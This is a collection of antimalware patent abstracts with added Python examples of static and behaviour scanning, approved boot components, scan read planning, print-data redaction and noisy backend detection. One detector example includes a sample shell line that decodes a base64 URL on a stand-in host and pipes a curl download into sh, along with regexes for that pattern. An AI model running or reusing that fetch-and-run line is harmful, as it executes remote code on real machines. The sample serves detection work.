Antimalware Protection of Virtual Machines
    1.
    Patent application, pending (published)

    Publication number: US20120144489A1

    Publication date: 2012-06-07

    Application number: US12961854

    Filing date: 2010-12-07

    IPC class: G06F21/00

    Abstract: The subject disclosure is directed towards protecting virtual machines on guest partitions from malware in a resource-efficient manner. Antimalware software is divided into lightweight agents that run on each malware-protected guest partition, a shared scanning and signature update mechanism, and a management component. Each agent provides the scanning mechanism with files to scan for malware, such as by running a script, and receives results from the scanning mechanism, including possible remediation actions to perform. The management component gives the scanning mechanism access to virtual machine services, such as pausing, resuming, snapshotting and rolling back guest partitions as requested by the scanning mechanism.

    Malware Detection Using Code Analysis and Behavior Monitoring
    4.
    Patent application, pending (published)

    Publication number: US20100031353A1

    Publication date: 2010-02-04

    Application number: US12025694

    Filing date: 2008-02-04

    IPC class: G06F11/00

    Abstract: Aspects of the subject matter described herein relate to malware detection using code analysis and behavior monitoring. In aspects, an anti-malware engine performs static analysis on program code and monitors the behavior the program code exhibits when it executes in a virtual and/or non-virtual environment. The anti-malware engine combines the results of both types of malware detection to determine whether the program code includes malware. The anti-malware engine may use feedback from one or more of the malware detection mechanisms to direct additional malware detection (e.g., static and/or behavior detection) for the program code.
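The combination-plus-feedback loop described in the abstract above, as an added illustration that is not code from the patent or from Microsoft: a toy static scanner (regex rules over script text) and a toy behaviour scanner (predicates over an event trace) each produce weighted hits; a hit on obfuscation from either side feeds the decoded strings back through static analysis. The samples, the event trace, the rules and the weights are all constructed for the example.

```python
import base64
import re

# Constructed samples: shell-script-like text plus a hand-written behaviour
# trace, so both detectors can run offline. Neither is a real malware sample.
SAMPLE = {
    "code": "x=$(echo aHR0cDovL2V4YW1wbGUuaW52YWxpZC9wYXlsb2Fk | base64 -d); curl -s $x | sh",
    "trace": ["exec:base64", "exec:curl", "net:connect example.invalid:80", "exec:sh"],
}
BENIGN = {
    "code": "tar czf backup.tgz /var/log && echo done",
    "trace": ["exec:tar", "fs:write backup.tgz"],
}

# Static rules: regex over the code, each with an assumed weight.
STATIC_RULES = {
    "base64_decode": (re.compile(r"base64\s+-d\b"), 1.0),
    "pipe_to_shell": (re.compile(r"\|\s*(sh|bash)\b"), 2.0),
    "download_tool": (re.compile(r"\b(curl|wget)\b"), 1.0),
}
# Behaviour rules: predicates over the ordered event trace, each with an assumed weight.
BEHAVIOUR_RULES = {
    "network_then_exec": (
        lambda t: any(e.startswith("net:") for e in t) and t[-1].startswith("exec:"), 2.5),
    "spawns_shell": (lambda t: "exec:sh" in t or "exec:bash" in t, 1.0),
}
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def static_scan(code):
    return {name: w for name, (rx, w) in STATIC_RULES.items() if rx.search(code)}


def behaviour_scan(trace):
    return {name: w for name, (pred, w) in BEHAVIOUR_RULES.items() if pred(trace)}


def analyze(sample, threshold=3.0):
    """Combine static and behaviour results; either detector can direct extra work."""
    hits = static_scan(sample["code"])
    steps = ["static"]
    hits.update(behaviour_scan(sample["trace"]))
    steps.append("behaviour")
    # Feedback: an obfuscation hit from either side sends decoded literals back
    # through static analysis, where a plain URL is easy to spot.
    if "base64_decode" in hits or "network_then_exec" in hits:
        for literal in B64_LITERAL.findall(sample["code"]):
            try:
                decoded = base64.b64decode(literal, validate=True).decode()
            except (ValueError, UnicodeDecodeError):
                continue
            if re.search(r"https?://", decoded):
                hits["decoded_url"] = 1.0
        steps.append("static-on-decoded")
    score = sum(hits.values())
    return {"malware": score >= threshold, "score": score,
            "hits": sorted(hits), "steps": steps}
```

The point of the feedback step is that neither detector alone sees the URL: statically it is an opaque base64 literal, dynamically it is only a connect event. Only after one side's hit triggers the decode does the other side get a rule it can match.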

    System and method of allowing user mode applications with access to file data
    5.
    Granted patent, in force

    Publication number: US07478237B2

    Publication date: 2009-01-13

    Application number: US10984207

    Filing date: 2004-11-08

    IPC class: H04L9/00 H04L9/32 G06F11/30

    CPC class: G06F21/566 G06F21/564

    Abstract: In accordance with this invention, a system, method, and computer-readable medium are provided that aggregate the knowledge base of a plurality of antivirus software applications. User mode applications, such as antivirus software applications, gain access to file system operations through a common information model, which obviates the need for antivirus software vendors to create kernel mode filters. When file system operations are made available to antivirus software applications, the present invention may cause each antivirus software application installed on a computing device to perform a scan to determine whether the data is malware.

    Protecting user mode processes from improper tampering or termination
    6.
    Granted patent, in force

    Publication number: US08621628B2

    Publication date: 2013-12-31

    Application number: US12713151

    Filing date: 2010-02-25

    IPC class: G06F21/00

    Abstract: In one embodiment, a malware protection system may protect a computing system from a malware event. A data storage device 150 may store a watchdog filter driver 240 integrated with an operating system kernel 210. A processor 120 may intercept a process access to an application process 220 with the watchdog filter driver 240 to detect a malware event. The processor 120 may use the watchdog filter driver 240 to determine the originating process for the malware event.

    DEVICE BOOTING WITH AN INITIAL PROTECTION COMPONENT
    7.
    Patent application, granted

    Publication number: US20110307711A1

    Publication date: 2011-12-15

    Application number: US12813955

    Filing date: 2010-06-11

    CPC class: G06F21/575

    Abstract: Booting a computing device includes executing one or more firmware components followed by a boot loader component. A protection component for the computing device, such as an anti-malware program, is identified and executed as the initial component after the boot loader component. One or more boot components are then executed, and these include only boot components that have been approved by the protection component. A list of boot components previously approved by the protection component can also be maintained in a tamper-proof manner.
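The approval flow described above, as an added example that is not the patent's or Microsoft's code: the protection component runs first, consults a list of previously approved components, evaluates anything not on it, and loads only what passes. The abstract says the list is kept tamper-proof but does not say how; this example assumes a keyed MAC (HMAC-SHA256) under a key that only the protection component holds, which makes tampering detectable rather than impossible. The component images, the key and the bad-hash set are all constructed for the example.

```python
import hashlib
import hmac
import json

# Assumption for this example: the protection component holds a key that the
# boot components it vets never see, so they cannot re-seal a modified list.
LIST_KEY = b"constructed-key-held-by-protection-component"

# Constructed stand-ins for boot component images (name -> bytes).
COMPONENTS = {
    "disk.sys": b"disk driver image v1",
    "net.sys": b"network driver image v1",
    "rootkit.sys": b"evil driver image",
}
# The protection component's own knowledge, reduced to a bad-hash set here.
KNOWN_BAD = {hashlib.sha256(b"evil driver image").hexdigest()}


def digest(image):
    return hashlib.sha256(image).hexdigest()


def seal(entries):
    """Serialise the approved list and append a keyed MAC over it."""
    body = json.dumps(sorted(entries), separators=(",", ":")).encode()
    tag = hmac.new(LIST_KEY, body, "sha256").hexdigest().encode()
    return body + b"\n" + tag


def unseal(blob):
    """Return the approved set, or None if the MAC does not verify."""
    body, _, tag = blob.rpartition(b"\n")
    expected = hmac.new(LIST_KEY, body, "sha256").hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        return None
    return set(json.loads(body))


def evaluate(image):
    """The protection component's check on a component it has not seen before."""
    return digest(image) not in KNOWN_BAD


def boot(sealed_list, components):
    """Run the protection component first, then load only approved components.
    Returns (loaded, refused, new sealed list)."""
    approved = unseal(sealed_list)
    if approved is None:
        approved = set()  # a list that fails verification is discarded, not trusted
    loaded, refused = [], []
    for name, image in components.items():
        entry = f"{name}:{digest(image)}"
        if entry in approved or evaluate(image):
            approved.add(entry)
            loaded.append(name)
        else:
            refused.append(name)
    return loaded, refused, seal(approved)
```

Two details matter in practice. The list entry binds the name to the image hash, so swapping a file under an approved name forces re-evaluation. And a list that fails the MAC is thrown away rather than partially trusted, so an attacker who can write the list but not the key gains nothing by editing it.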

    System and method for efficiently scanning a file for malware
    8.
    Granted patent, in force

    Publication number: US07861296B2

    Publication date: 2010-12-28

    Application number: US11154267

    Filing date: 2005-06-16

    IPC class: G06F11/00

    CPC class: G06F21/51 G06F21/566

    Abstract: The present invention is directed toward a system, method, and computer-readable medium for efficiently loading data into memory in order to scan the data for malware. The logic provided in the present invention improves the experience of a user operating a computer protected with antivirus software. One aspect of the present invention is a method that identifies the pattern in which data in a file is loaded into memory from a computer-readable medium. The method then identifies a pattern in which the file's data may be loaded into memory in a way that minimizes the time required to read it. When a subsequent scan of the file is scheduled, the method causes the file's data to be loaded into memory using the pattern that minimizes the read time.
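One realisation of the two-phase approach above, as an added example that is not the patent's or Microsoft's code: the first scan records the (offset, length) of every read the scanner issues; a planning step sorts those reads and coalesces ranges that sit within a small gap of each other; later scans read the merged ranges in ascending order, which turns a scattered access pattern into a few sequential reads. The read trace, the gap tolerance and the file contents are constructed for the example.

```python
# Constructed access trace: (offset, length) of each read the scanner issued the
# first time it parsed this file. Offsets are made up to look like a PE layout.
OBSERVED_READS = [
    (0, 512),        # DOS/PE headers
    (40960, 4096),   # resource section
    (512, 1024),     # section table, right after the headers
    (8192, 4096),    # start of .text
    (41472, 4096),   # more resources, adjacent to the earlier resource read
    (12288, 4096),   # rest of .text, adjacent to the earlier .text read
]
GAP_TOLERANCE = 4096  # merge ranges separated by less than this (assumed value)

# Constructed file contents, large enough to cover every range above.
FILE_DATA = bytes(range(256)) * 200  # 51200 bytes


def record_pattern(reads, gap=GAP_TOLERANCE):
    """Turn an observed read trace into a sorted list of coalesced byte ranges."""
    ranges = sorted((off, off + length) for off, length in reads)
    merged = []
    for start, end in ranges:
        if merged and start <= merged[-1][1] + gap:
            merged[-1] = (merged[-1][0], max(merged[-1][1], end))
        else:
            merged.append((start, end))
    return merged


def seek_count(plan):
    """Non-sequential jumps a reader makes when following the plan in order."""
    jumps, pos = 0, 0
    for start, end in plan:
        if start != pos:
            jumps += 1
        pos = end
    return jumps


def load_with_plan(data, plan):
    """Read the file in plan order, returning (offset, bytes) chunks for the scanner."""
    return [(start, data[start:end]) for start, end in plan]


def covers(plan, reads):
    """Check that every originally observed read lies inside some planned range."""
    return all(any(s <= off and off + n <= e for s, e in plan) for off, n in reads)
```

The check in `covers` is the one a practitioner should keep: a faster plan that drops a byte the scanner needs is a detection gap, not an optimisation. The gap tolerance trades a little extra I/O for fewer seeks; on the trace above the six scattered reads collapse to three sequential ones.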

    Controlling Sensitive Information Leakage in Printing
    9.
    Patent application, pending (published)

    Publication number: US20100060925A1

    Publication date: 2010-03-11

    Application number: US12206749

    Filing date: 2008-09-09

    IPC class: G06F3/12

    CPC class: G06F21/608 G06F3/1296

    Abstract: Aspects of the subject matter described herein relate to controlling sensitive information leakage in printing. In aspects, one or more interception units sit in the print path(s) of a device. The interception unit(s) receive print data generated on the device and extract information from it. The extracted information is used to determine whether the print data includes sensitive information. If the print data includes sensitive information, a policy is applied and the print data may or may not be forwarded towards a printer. Otherwise, the print data is forwarded towards a printer without applying a policy.
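An interception unit of the kind described above, as an added example that is not the patent's or Microsoft's code. It takes print data, extracts text, classifies it with a Luhn-checked card pattern and an SSN pattern, and applies a per-kind policy (block or redact) only when something sensitive is found; clean jobs pass through untouched. The print jobs are constructed plain text, and the step of pulling text out of a real spooled page description language is assumed rather than implemented.

```python
import re

# Constructed print jobs as plain text. A real interception unit would first
# extract text from the spooled page description language; that step is assumed.
JOBS = {
    "memo": b"Lunch is at 12:30 in room 4B.",
    "invoice": b"Bill to card 4111 1111 1111 1111, exp 09/27.",
    "hr": b"Employee SSN 123-45-6789 on file.",
}

SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")
# Policy per kind of sensitive data (assumed values).
POLICY = {"ssn": "block", "card": "redact"}


def luhn_ok(s):
    """Mod-10 check so an arbitrary run of digits is not mistaken for a card number."""
    digits = [int(c) for c in s if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def extract_sensitive(print_data):
    """Pull text from the print data and return (kind, value) findings."""
    text = print_data.decode("utf-8", errors="replace")
    found = [("ssn", m.group()) for m in SSN_RE.finditer(text)]
    found += [("card", m.group()) for m in CARD_RE.finditer(text) if luhn_ok(m.group())]
    return found


def intercept(print_data, policy=POLICY):
    """Apply policy only when sensitive data is present; otherwise forward untouched.
    Returns (action, data): ("forward", bytes) or ("block", None)."""
    found = extract_sensitive(print_data)
    if not found:
        return "forward", print_data
    actions = {policy.get(kind, "block") for kind, _ in found}
    if "block" in actions:
        return "block", None
    text = print_data.decode("utf-8", errors="replace")
    for kind, value in found:
        text = text.replace(value, f"[REDACTED {kind.upper()}]")
    return "forward", text.encode()
```

Unknown kinds default to block, so adding a new detector without a policy entry fails closed. The Luhn check keeps long numeric strings such as serial numbers from tripping the card rule, which is what stops a rule like this from blocking half of an engineering department's printouts.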

    Applying Antimalware Logic without Revealing the Antimalware Logic to Adversaries
    10.
    Patent application, granted

    Publication number: US20120317644A1

    Publication date: 2012-12-13

    Application number: US13156726

    Filing date: 2011-06-09

    IPC class: G06F21/00

    CPC class: G06F21/552 G06F21/566

    Abstract: The subject disclosure is directed towards a technology by which antimalware detection logic is maintained and operated at a backend service, which a customer frontend machine queries for purposes of malware detection. In this way, some antimalware techniques are kept at the backend service rather than revealed to malware authors. The backend antimalware detection logic may be based upon feature selection, and may be updated rapidly, faster than malware authors can track. Noise may be added to the results to make it difficult for malware authors to deduce the logic behind them. The backend may return results indicating malware or not malware, or return inconclusive results. The backend service may also detect probing-related queries that are part of an attempt to deduce the unrevealed antimalware detection logic, returning noisy results in response and/or taking other actions to foil the attempt.
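The query protocol sketched above, as an added example that is not the patent's or Microsoft's code: a frontend sends a set of feature names, the backend scores them against weights it never reveals, returns malware / clean / inconclusive, blurs answers that fall near a decision threshold, and watches each client for the one-feature-at-a-time query pattern an adversary uses to map the boundary. Once a client is flagged, its answers stop tracking the logic at all. The feature names, weights, thresholds and probing heuristics are all assumptions for the example.

```python
import random
from collections import defaultdict, deque

# Constructed feature weights standing in for the backend's feature-selection
# logic; the abstract does not disclose the real features or weights.
WEIGHTS = {
    "packed": 2.0,
    "no_signature": 1.0,
    "writes_autorun": 2.5,
    "injects_remote_thread": 3.0,
    "contacts_raw_ip": 1.5,
    "deletes_shadow_copies": 4.0,
}
MALWARE_THRESHOLD = 5.0
CLEAN_THRESHOLD = 2.0
NOISE_BAND = 1.0       # scores this close to a threshold may be blurred
PROBE_WINDOW = 8       # recent queries remembered per client
PROBE_NEAR_DUPES = 5   # near-duplicate queries that count as probing


class Backend:
    def __init__(self, seed=1):
        self.rng = random.Random(seed)
        self.history = defaultdict(lambda: deque(maxlen=PROBE_WINDOW))
        self.flagged = set()

    def score(self, features):
        return sum(WEIGHTS.get(f, 0.0) for f in features)

    def _looks_like_probing(self, client, features):
        """Many recent queries that differ from this one by only one or two features."""
        hist = self.history[client]
        near = sum(1 for prev in hist if len(prev ^ features) <= 2)
        hist.append(features)
        return near >= PROBE_NEAR_DUPES

    def query(self, client, features):
        features = frozenset(features)
        if self._looks_like_probing(client, features):
            self.flagged.add(client)
        if client in self.flagged:
            # A probing client gets answers unrelated to the logic.
            return self.rng.choice(["malware", "clean", "inconclusive"])
        s = self.score(features)
        if s >= MALWARE_THRESHOLD:
            verdict = "malware"
        elif s <= CLEAN_THRESHOLD:
            verdict = "clean"
        else:
            verdict = "inconclusive"
        near_edge = (abs(s - MALWARE_THRESHOLD) < NOISE_BAND
                     or abs(s - CLEAN_THRESHOLD) < NOISE_BAND)
        if near_edge and self.rng.random() < 0.5:
            verdict = "inconclusive"  # noise: the exact threshold stays hidden
        return verdict


def run_probe(backend, client, base, candidates):
    """An adversary mapping the logic by toggling one feature per query."""
    backend.query(client, base)
    for f in candidates:
        backend.query(client, set(base) | {f})
    return client in backend.flagged
```

Clear-cut samples still get a deterministic answer, which is what keeps the service useful; only the band around each threshold is noisy, and only a client whose query stream looks like a search gets cut off. A real deployment would key the probing heuristic on more than a client identifier, since an adversary can spread the same search over many frontends.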